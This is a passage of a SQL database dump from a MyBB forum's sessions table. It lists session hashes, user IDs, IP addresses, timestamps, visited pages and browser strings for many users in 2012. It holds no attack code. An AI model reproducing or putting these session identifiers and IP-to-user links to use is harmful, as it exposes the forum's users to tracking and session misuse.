'0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('eb043ca611a9d95501907e150e818b4e', '72', '78.58.52.147', '1345299535', '/private.php?action=read&amp;pmid=222', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('98d56dd021951e5ea716afa40726d3e4', '97', '70.173.58.33', '1345640391', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('6baa38445daaca02188e4486fd700d1b', '87', '2.222.163.112', '1346787488', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('82473685d4b0c52ed16b112b0907f9bf', '101', '66.87.4.160', '1346379487', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('481da73dfce6e8ce2dd1511e2bb0fe72', '114', '70.143.76.31', '1346109524', '/memberlist.php?sort=regdate&amp;order=ascending&amp;perpage=20', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('0a17e3626728093453a6218c7447b34a', '108', '5.135.12.96', '1345810768', '/usercp.php?action=editsig', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('698a7bd83c717ecc6943067d206eeeea', '113', '92.5.146.21', '1345831410', '/showthread.php?tid=185&amp;pid=646', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', '0', '0', '4', '185'); INSERT INTO mybb_sessions VALUES('e9a7d70fefdc57b54786de3b5223fe32', '120', '182.50.64.67', '1345888248', '/search.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('9c37d81898c69b944a3b314bc54c7d7a', '128', '213.49.119.132', '1345918637', '/showthread.php?tid=113', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '15', '113'); INSERT INTO mybb_sessions VALUES('9bdfb0f95a829b629195720dbdeb2766', '119', '216.38.2.194', '1345900004', '/forumdisplay.php?fid=40', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '40', '0'); INSERT INTO mybb_sessions VALUES('710a60de4d202e5243f4b8985c5656b4', '122', '69.15.13.113', '1346190350', '/forumdisplay.php?fid=10', 'Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; SCH-R720 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, l', '0', '0', '10', '0'); INSERT INTO mybb_sessions VALUES('d7699835bcea0456545fd25c4efd1b57', '123', '87.151.195.77', '1345907481', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('ab490f6f4849774deee0372bade2183d', '116', '2.98.233.26', '1346350994', '/showthread.php?tid=186', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', '0', '0', '16', '186'); INSERT INTO mybb_sessions VALUES('004df2d8cfff218ec27c9e8ef1eaee2b', '124', '134.3.161.123', '1345913832', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e95a2a934c758be9834e9cff6d95bd97', '125', '42.106.175.146', '1350223657', '/usercp.php?action=usergroups', 'Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.26918/28.2725; U; en) Presto/2.8.119 Version/11.10', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('d23fb860a467b98fe22727a2bb381adb', '129', '24.126.110.197', '1345971568', '/member.php?action=profile&amp;uid=129', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('46795db90ac294b74c7ac58b55e08f3e', '131', '217.123.173.181', '1345975455', '/showthread.php?tid=153', 'Opera/9.80 (Windows NT 6.1; WOW64; U; nl) Presto/2.10.289 Version/12.01', '0', '0', '34', '153'); INSERT INTO mybb_sessions VALUES('952689f52429ce5f77b11a6731aa39e2', '132', '24.50.23.117', '1346620766', '/forumdisplay.php?fid=16', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '16', '0'); INSERT INTO mybb_sessions VALUES('7e753be1f2bdb13d66ce5ff1ac682299', '133', '74.125.178.31', '1346041044', '/member.php?&amp;action=do_login', 'Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1 AppEngine-Google; (+http://code.', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e6d632ba9310f9ede53bea5413bbb3d0', '139', '24.132.198.229', '1346531651', '/showthread.php?tid=281', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '29', '281'); INSERT INTO mybb_sessions VALUES('f017a157099e6d244a53d5aedf579359', '141', '72.134.24.117', '1346702906', '/showthread.php?tid=321', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1', '0', '0', '34', '321'); INSERT INTO mybb_sessions VALUES('f6a4b759ab20b1c31ce16772f24c91da', '147', '188.22.16.120', '1346266848', '/showthread.php?tid=271', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '53', '271'); INSERT INTO mybb_sessions VALUES('005bd30018a38de03e9d5e2146dc2cf7', '148', '183.83.29.21', '1346306562', '/search.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('311425947f89e209c50983892550a761', '155', '173.52.27.23', '1346370888', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('027a91071b75ea196cebb595a301cbc4', '151', '60.52.87.169', '1346346477', '/showthread.php?tid=148', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '12', '148'); INSERT INTO mybb_sessions VALUES('84b04f332b664c9b37810b4a696dda24', '158', '68.40.229.156', '1346719969', '/showthread.php?tid=281', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '29', '281'); INSERT INTO mybb_sessions VALUES('736536cd6463355022f28c40250911e5', '153', '173.245.52.108', '1346361446', '/showthread.php?tid=103', 'Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '12', '103'); INSERT INTO mybb_sessions VALUES('936b5cc158b08e6ead7e17e8a40c7377', '154', '92.234.104.156', '1346403789', '/usercp.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('57d932d957a330099c0828dbc1bd0b36', '159', '65.27.123.23', '1346596694', '/showthread.php?tid=32', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '16', '32'); INSERT INTO mybb_sessions VALUES('ad329716c7010662d2732219537b3807', '154', '86.29.242.162', '1346496503', '/forumdisplay.php?fid=54', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '54', '0'); INSERT INTO mybb_sessions VALUES('16cb8643df35b6206adb823eeac6a2f8', '161', '164.58.144.196', '1346781406', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.5072', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('10bcd52f488c78f62433c5860be05d53', '50', '182.177.53.90', '1346448942', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a11d076833ae776bcc6ec27030a91a7f', '159', '63.131.6.24', '1346526472', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.5072', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('31595d2ed018d46b94e091f557b454e2', '164', '181.1.202.219', '1346530403', '/forumdisplay.php?fid=9', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '9', '0'); INSERT INTO mybb_sessions VALUES('e6b952d8716ee6ef1f1510489c733d87', '165', '209.73.132.221', '1346552886', '/forumdisplay.php?fid=52', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0', '0', '0', '52', '0'); INSERT INTO mybb_sessions VALUES('ee9857161126d53b11b4a6c5742a538a', '168', '178.239.48.14', '1346853572', '/newthread.php?fid=3&amp;processed=1&amp;action=do_newthread&amp;tid=', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 AlexaToolbar/alxf-2.15', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3e9903bfb9e7c88ad63d24f859b58512', '167', '83.147.183.30', '1346689380', '/showthread.php?tid=238', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '56', '238'); INSERT INTO mybb_sessions VALUES('fe14ae925eff57fd980ec26240c62d38', '171', '67.68.224.95', '1346873495', '/forumdisplay.php?fid=15', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '15', '0'); INSERT INTO mybb_sessions VALUES('204fe2f40c2a52050b13880a66797934', '173', '99.228.31.50', '1346803209', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/15.0 Firefox/15.0a1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('195148c8ef39f40cd80d23be3f1eb25e', '174', '65.49.68.185', '1346838524', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR ', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('b0f190d02ce679f8727a61b0d1526185', '191', '24.190.244.64', '1347770311', '/showthread.php?tid=275', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '12', '275'); INSERT INTO mybb_sessions VALUES('7d1b1243d013cf860b0334c012cfcb86', '192', '24.6.164.63', '1347875371', '/search.php?action=results&amp;sid=d78d2c2ba6f6c8cd2d5f9f9b54d4c25c&amp;sortby=lastpost&amp;order=desc&amp;uid=0', 'Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('61621f627e7a5c285f2669f2e74c6148', '178', '94.13.132.145', '1346968848', '/private.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('afafddb994a3b4c9558b23494a1cf356', '90', '161.73.47.173', '1351214977', '/showthread.php?tid=1012', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '16', '1012'); INSERT INTO mybb_sessions VALUES('33920cbf73f5ba7c24a2c23629d5502c', '180', '77.86.33.102', '1347123679', '/showthread.php?tid=275', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '12', '275'); INSERT INTO mybb_sessions VALUES('0bc229e7f57d992549652dda25f724f3', '182', '195.91.108.175', '1348909682', '/showthread.php?tid=508', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '13', '508'); INSERT INTO mybb_sessions VALUES('28a46f805d68e67f678a70dc7205484f', '127', '83.109.119.246', '1348071820', '/forumdisplay.php?fid=15', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '15', '0'); INSERT INTO mybb_sessions VALUES('208ec58275d2f3fb3538b0b424e40d0e', '183', '69.119.94.188', '1347362808', '/showthread.php?tid=228', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '12', '228'); INSERT INTO mybb_sessions VALUES('48b5f781bbd0f51817f3fffc4ef63654', '193', '117.216.90.113', '1347894850', '/private.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.12 (KHTML, like Gecko) Maxthon/3.4.3.1200 Chrome', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7cd99da40748253e40125f0a3138a809', '187', '75.34.59.228', '1347655471', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('269fa53215226a791355d062dc46c9fc', '188', '68.83.86.251', '1347928962', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('51601fa00cac930a1c6c9931aa76fb69', '55', '98.176.49.100', '1347749623', '/search.php?action=results&amp;sid=ee1880aa38e9767ea6756945a0f230ba', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('0e763a5e995dc8f6e4a407fa7043fc7d', '289', '78.70.49.201', '1351093757', '/showthread.php?tid=800', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '15', '800'); INSERT INTO mybb_sessions VALUES('f5d8ff57cdd77e24d61387a018fe87a4', '189', '95.19.100.107', '1347742516', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8941eb976e3c541f3b1649d3f4ae5b75', '20', '24.59.243.229', '1350505107', '/newthread.php?fid=63', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('6c9e598222061ca582ac8d8209bb3391', '184', '99.164.138.156', '1347821473', '/forumdisplay.php?fid=12', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '12', '0'); INSERT INTO mybb_sessions VALUES('f9f99ba2747721bac0d328224a149422', '112', '2.100.220.219', '1350390938', '/index.php?', 'Opera/9.80 (Windows NT 6.1; Win64; x64; U; en) Presto/2.10.289 Version/12.02', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('9771a905805e16b530bf8b5c39f8ae9f', '194', '99.42.159.191', '1351817794', '/upgrade.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('1547fefd7ab7dc4729a764e982d78a38', '48', '195.158.72.91', '1351967295', '/forumdisplay.php?fid=15', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.122', '0', '0', '15', '0'); INSERT INTO mybb_sessions VALUES('1b599ec292c33a2d891d033254e1d436', '198', '68.204.185.63', '1348541163', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.118', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('81a71f4118a7e0e9c26cfb22362d0b20', '197', '84.31.88.238', '1348522469', '/showthread.php?tid=49', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '21', '49'); INSERT INTO mybb_sessions VALUES('6b614e676929010da6df6822af90aaa2', '202', '180.247.247.206', '1348812320', '/forumdisplay.php?fid=13', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '13', '0'); INSERT INTO mybb_sessions VALUES('851affac10429d0611f5781babbf8ccc', '172', '88.193.83.195', '1352143918', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3802a5234127ab6e5cb4cce52342ce35', '219', '94.0.65.178', '1349465993', '/search.php?action=results&amp;sid=8ca598098991264e8b00e0dd6cde72f9', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('ed6ce332bb97d4d37cb504a4b2f46094', '201', '199.58.84.3', '1348805352', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('9395a328baebfabed6e254f9d51f39af', '201', '46.246.31.97', '1348880165', '/showthread.php?tid=532', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '23', '532'); INSERT INTO mybb_sessions VALUES('9c431008c92479015ce159b9182bc10d', '204', '122.52.119.1', '1348892480', '/showthread.php?tid=49', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '21', '49'); INSERT INTO mybb_sessions VALUES('264fc5ba0b826f19aaf47fc13805c8a1', '206', '122.176.146.207', '1349793611', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3c939de0948d0591a351fef07793851f', '207', '76.28.177.62', '1350164261', '/search.php?action=results&amp;sid=2909d42fabd44f2796c2c0c2b63a92ca', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8009b5d5fb6fb8e1c214d2265d43f74e', '208', '182.178.29.232', '1349012951', '/showthread.php?tid=113', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '15', '113'); INSERT INTO mybb_sessions VALUES('55bc8194248dd3fc9126e41e2e6b546b', '210', '173.76.159.245', '1350035464', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a64531f5805c05cc4b17b7e1ba9301ca', '211', '174.127.99.162', '1349056766', '/showthread.php?tid=508', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '13', '508'); INSERT INTO mybb_sessions VALUES('69c153660bf7661a8fabaad185be7732', '212', '176.92.96.130', '1349092204', '/newreply.php?ajax=1&amp;action=do_newreply&amp;tid=543', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('07ff02d9cfed0b0a4e7909948165cfdd', '223', '174.127.99.156', '1350163790', '/showthread.php?tid=726', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '13', '726'); INSERT INTO mybb_sessions VALUES('1053abfe0e3cba4454b84a4ecfdd43ba', '215', '121.7.73.219', '1349341043', '/showthread.php?tid=137', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '13', '137'); INSERT INTO mybb_sessions VALUES('0633a4a0d7c084a507a2c2296b671c32', '216', '197.226.120.114', '1349365459', '/showthread.php?tid=173', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.91 Safari/537.4', '0', '0', '14', '173'); INSERT INTO mybb_sessions VALUES('1fa1d9bb33a45052d07f4eb5e0a4a7ba', '217', '75.114.206.243', '1349386955', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('71d5b56fdfb3112eaa064c03a3294849', '220', '112.204.57.97', '1349440518', '/showthread.php?tid=609', 'Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '58', '609'); INSERT INTO mybb_sessions VALUES('e807982ada029689c318097991ea3032', '231', '99.233.52.247', '1349729595', '/showthread.php?tid=762', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '58', '762'); INSERT INTO mybb_sessions VALUES('940bb494395ac071d021ffaa557a01e4', '213', '178.250.34.208', '1350400184', '/search.php?action=results&amp;sid=bd916566b71cdb069c257c05797e1f24', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e3fb24922ddb1f2045b8522dfc3ed2f3', '237', '203.92.138.166', '1351348944', '/forumdisplay.php?fid=21', 'Opera/9.80 (J2ME/MIDP; Opera Mini/7.0.28870/28.2794; U; en) Presto/2.8.119 Version/11.10', '0', '0', '21', '0'); INSERT INTO mybb_sessions VALUES('a3e93b9ca93b0d7de8e38dfc312a5f39', '240', '86.135.56.214', '1349800873', '/showthread.php?tid=713', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '12', '713'); INSERT INTO mybb_sessions VALUES('0fbcf78aad5be9441bea8dce4bb24b44', '225', '75.162.63.152', '1349745368', '/showthread.php?tid=696', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '13', '696'); INSERT INTO mybb_sessions VALUES('ddbc3ed74db57c6bef8b90acb82e9ec0', '250', '24.61.32.100', '1350433718', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.122', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8668e4f60439b8542bbadfae42e8a53a', '238', '108.221.21.146', '1349707765', '/showthread.php?tid=132', 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '20', '132'); INSERT INTO mybb_sessions VALUES('f6a1a05b3e83cafa624c7c75e78f5cb8', '241', '108.18.121.45', '1350934535', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('b02fa5e629090317d4db2da01906251e', '261', '84.85.88.250', '1350225214', '/showthread.php?tid=591', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '21', '591'); INSERT INTO mybb_sessions VALUES('7c8c211f55ddb2987fab4f868e33c784', '252', '180.251.249.167', '1350065894', '/showthread.php?tid=563', 'Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '25', '563'); INSERT INTO mybb_sessions VALUES('0789daba3dcda8a7d7e3a4520d06f500', '240', '86.173.50.88', '1350179489', '/showthread.php?tid=804', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version', '0', '0', '42', '804'); INSERT INTO mybb_sessions VALUES('7faea9c77a6174aac92ee9372e718ef8', '256', '76.105.69.111', '1350137823', '/showthread.php?tid=50', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '12', '50'); INSERT INTO mybb_sessions VALUES('5edca3867589f5fa08ebc8c7883735ba', '203', '67.68.73.22', '1350088783', '/index.php?', 'Mozilla/5.0 (iPod; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('dc434333ce48e87238d2f72cc13d2457', '253', '173.76.159.245', '1350439381', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('49e22e1589c5d37a495714eaeeab3633', '267', '110.143.162.220', '1350456684', '/showthread.php?tid=616', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '67', '616'); INSERT INTO mybb_sessions VALUES('2518c7a7cc8e0447eb97d0e3326e93bc', '264', '90.185.118.218', '1350590147', '/search.php?action=getdaily', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobi', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('dd6c1f97aa95a7e50f7af406e8542daa', '128', '213.49.101.145', '1350160938', '/showthread.php?tid=764', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '15', '764'); INSERT INTO mybb_sessions VALUES('64e5238e2f8746d7dc457db334dcdf0f', '293', '41.250.224.98', '1351971786', '/index.php?', 'Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X; nl-nl) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a9c69e01a023803d959b365f2026489d', '288', '216.104.36.237', '1351052169', '/misc.php?action=username_history&amp;uhuid=222', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('5e73b06029c564b0d5a73f1c9c76b432', '265', '78.143.155.3', '1351792594', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e5b387e9f3ee8d27e53d9211a0a191e4', '314', '129.121.101.56', '1352006222', '/usercp.php?action=editsig', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('c67caadda46ad08557b58f50a703b365', '268', '206.82.167.137', 